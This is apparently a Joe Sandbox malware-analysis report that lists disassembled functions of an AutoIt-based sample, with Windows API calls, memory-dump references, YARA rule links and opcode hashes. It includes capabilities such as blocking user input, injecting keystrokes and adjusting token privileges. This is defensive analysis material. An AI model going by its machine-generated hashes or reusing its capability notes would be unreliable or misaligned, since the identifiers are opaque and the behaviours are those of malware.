                                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00D652EE,?,?,00000035,?), ref: 00D54239
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                  • Opcode ID: 72104398f5f7f5a0545e8d96334ee1364ccce1324b29aa9b5c7c9463912489dd
                                                                                                                                                                                                                                                                  • Instruction ID: 8337941c2430c8f9bdf945ada24812e3029fd651180bd083048ab152bcae14bc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72104398f5f7f5a0545e8d96334ee1364ccce1324b29aa9b5c7c9463912489dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDF0E5306003346AEB201666AC4DFFB367EEFC5765F000175F909E2291D9709D84C6B5
                                                                                                                                                                                                                                                                  Function 00D4BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00D4BC24
                                                                                                                                                                                                                                                                  • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00D4BC37
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                  • Opcode ID: d0d91310edd55400db8026a7cee3048b669889c8eb2f350f46f5f1a293dc9068
                                                                                                                                                                                                                                                                  • Instruction ID: 34a18d5161ecf07b346b6fa88fd70c85c1d053dbfe3401489a268dac36e610ec
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0d91310edd55400db8026a7cee3048b669889c8eb2f350f46f5f1a293dc9068
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABF06D7080024DABDB059FA0C806BBE7BB0FF04319F04800AF955E5191D379C201DFA4
                                                                                                                                                                                                                                                                  Function 00D41A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D41B48), ref: 00D41A20
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00D41B48), ref: 00D41A35
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                                                                                                                                                  • Opcode ID: f9a7e6d55e5045cc047a49c3078d9d73f254705a43b83883f42e968a1481c1cc
                                                                                                                                                                                                                                                                  • Instruction ID: e12c1ec82ad54937a54312bbf245fb5c3dbafd53694f1384cc112b6c76692039
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9a7e6d55e5045cc047a49c3078d9d73f254705a43b83883f42e968a1481c1cc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAE09A72014711BFE7252B10FC06F767BA9EF04311F14891DB599D44B0EA626C91DB60
                                                                                                                                                                                                                                                                  Function 00D5F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • BlockInput.USER32(00000001), ref: 00D5F51A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BlockInput
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9972bc2cfe4709a8a43c1a824e317e293c5e517227b21ed25e0984b69fd12af4
                                                                                                                                                                                                                                                                  • Instruction ID: c2021303ae3c9010f254e2b03ea5c5cea61e9f0ebc72befcb71e6284894d9a6e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9972bc2cfe4709a8a43c1a824e317e293c5e517227b21ed25e0984b69fd12af4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCE048322003145FCB109F6AD444D9AF7ECAFA4761F048425FC89CB351D670F9458BA0
                                                                                                                                                                                                                                                                  Function 00D00D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00D0075E), ref: 00D00D4A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                  • Opcode ID: 25a0ccb0ef10ce506a01b0c54376135d24898958d9691228cc8d4843c9370fac
                                                                                                                                                                                                                                                                  • Instruction ID: 3f3d58b891aee89135d43695036f8ac9039a59ac7ffd1a6d3eea7ae243206982
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25a0ccb0ef10ce506a01b0c54376135d24898958d9691228cc8d4843c9370fac
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                  Function 00D6353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D6358D
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D635A0
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00D635AF
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D635CA
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00D635D1
                                                                                                                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00D63700
                                                                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00D6370E
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D63755
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00D63761
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D6379D
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D637BF
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D637D2
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D637DD
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00D637E6
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D637F5
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00D637FE
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D63805
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00D63810
                                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D63822
                                                                                                                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D80C04,00000000), ref: 00D63838
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00D63848
                                                                                                                                                                                                                                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00D6386E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00D6388D
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D638AF
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D63A9C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                  • Opcode ID: 25a0e2832d824af4e241db36052c67ba2bdc8962a2c6dd5d51d22a6bb00cb7a3
                                                                                                                                                                                                                                                                  • Instruction ID: 6e2f97e966ca55497fcc1e6bb232bfc9ddc6ae8d303daa17b16be657110a16cd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25a0e2832d824af4e241db36052c67ba2bdc8962a2c6dd5d51d22a6bb00cb7a3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E023D72900205EFDB14DFA5CD89EAE7BBAEF48310F148158F919AB2A1D774AD41CF60
                                                                                                                                                                                                                                                                  Function 00D77B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00D77B67
                                                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00D77B98
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00D77BA4
                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00D77BBE
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00D77BCD
                                                                                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00D77BF8
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 00D77C00
                                                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00D77C07
                                                                                                                                                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00D77C16
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D77C1D
                                                                                                                                                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00D77C68
                                                                                                                                                                                                                                                                  • FillRect.USER32(?,?,?), ref: 00D77C9A
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D77CBC
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: GetSysColor.USER32(00000012), ref: 00D77E5B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: SetTextColor.GDI32(?,00D77B2D), ref: 00D77E5F
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: GetSysColorBrush.USER32(0000000F), ref: 00D77E75
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: GetSysColor.USER32(0000000F), ref: 00D77E80
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: GetSysColor.USER32(00000011), ref: 00D77E9D
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D77EAB
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: SelectObject.GDI32(?,00000000), ref: 00D77EBC
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: SetBkColor.GDI32(?,?), ref: 00D77EC5
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: SelectObject.GDI32(?,?), ref: 00D77ED2
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00D77EF1
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D77F08
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: GetWindowLongW.USER32(?,000000F0), ref: 00D77F15
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                  • Opcode ID: 037dc0bd67e1da8a9cc3ac75b2656102ddb21146543abab62019c78d21f605ea
                                                                                                                                                                                                                                                                  • Instruction ID: 1ad228915e1e641e2bb4a0fce5360ab8f4053b114ab3e08ad5ce85ee2d0e3446
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 037dc0bd67e1da8a9cc3ac75b2656102ddb21146543abab62019c78d21f605ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEA18171108301AFD7119F64DC48E6B7BBAFF49320F144A19F96AD62E0E771D984CB61
                                                                                                                                                                                                                                                                  Function 00CE1625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,?), ref: 00CE16B4
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D22B07
                                                                                                                                                                                                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D22B40
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D22F85
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CE1488,?,00000000,?,?,?,?,00CE145A,00000000,?), ref: 00CE1865
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001053), ref: 00D22FC1
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D22FD8
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D22FEE
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D22FF9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 30cb06cf8f2aa6ed695ebf326d6af1d390b7cc4d2b5207132e30173ebf26646d
                                                                                                                                                                                                                                                                  • Instruction ID: 11e256147f93002765c16c7fb2ee92345e16e051575151365ec6c3720cb7fa33
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30cb06cf8f2aa6ed695ebf326d6af1d390b7cc4d2b5207132e30173ebf26646d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4129830204361EFCB25CF15E884BBAB7A5FF54308F1C4569F899DB261C731A992DBA1
                                                                                                                                                                                                                                                                  Function 00D6316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00D6319B
                                                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D632C7
                                                                                                                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00D63306
                                                                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00D63316
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00D6335D
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00D63369
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00D633B2
                                                                                                                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00D633C1
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00D633D1
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00D633D5
                                                                                                                                                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00D633E5
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D633EE
                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00D633F7
                                                                                                                                                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00D63423
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00D6343A
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00D6347A
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00D6348E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00D6349F
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00D634D4
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00D634DF
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00D634EA
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00D634F4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                  • Opcode ID: 5d1241ed9ca8e50bba70d26b7082476babb79e1d1fbdcb278ae3977ea6de24d6
                                                                                                                                                                                                                                                                  • Instruction ID: 0a6f9c2e1cd8915e4f5f08a920bc8d464ba693075ae3dfeb9661a01ef0f6d0a1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d1241ed9ca8e50bba70d26b7082476babb79e1d1fbdcb278ae3977ea6de24d6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AB12B71A40215AFEB14DFA9CC89FAE7BB9EF48710F004619F915E7290D774AD40CB64
